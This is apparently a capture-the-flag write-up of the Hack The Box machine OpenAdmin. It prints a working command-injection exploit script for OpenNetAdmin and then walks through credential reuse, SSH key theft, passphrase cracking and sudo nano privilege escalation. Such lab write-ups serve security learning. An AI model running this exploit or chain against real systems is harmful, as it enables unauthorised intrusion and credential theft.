
Hello fellow hackers, today we are going to solve OpenAdmin from hack the the box , it’s really interesting box, so lets get started!!!
as always we start with nmap to check for the open ports and services
nmap -A -v -sT 10.10.0.171

so the box have 2 services running:
1- ssh on port 22
2- Apache web server on port 80
let’s check out the web server….

So the default server page is there; lets check out if there is other pages or web sites on the server…

after running gobuster against the web server i fond two websites :
1- artwork
2- music

the web sites are static but when we try too login in music site the site direct us to other page …. /ona !!!
lets see what’s that ….

ona is a network management system and after some google search i found a command injection exploit for it in exploitdb …… lets try it out!!
#!/bin/bash URL="${1}" while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done

And and it worked !!!! we have a shell as www-data user
after some enumeration we found two user
1- joanna
2- jimmy
and after reading about ona services we found that the database creds are stored in local/config/database_settings.inc.php

and we have a password: n1nj4W4rri0R! ….. lets try it with the users we have on ssh

and we are in as jimmy ….
going back to /var /www/ we found a new folder called internal owend by joanna and have 3 php file inside it :
1- index.php
2-main.php
3- logout.php

and we found something interesting in main.php , it perform a command grabbing joanna ssh key …..

so we need to access this website internally .. lets use curl …
curl localhost/main.php
we couldn’t access the site ….. after some enumeration i found the the web site is running on port 52846

lets try now …
curl localhost:52846/main.php

and there you have it !! we have the ssh key for Joanna
now lets try to crack passphrase from the key
using ssh2john.py from GitHub to convert the key into hash to crack with john the ripper
then we pass it to john and used rockyou.txt to crack the key

and we cracked it !!! bloodninjas

and we are in as joanna ….
now for the root part
joanna can run nano as root accessing /opt/priv file

sudo nano /opt/priv
with the help of GTFOBins we got a root shell from nano
https://gtfobins.github.io/gtfobins/nano/

SMT RedTeam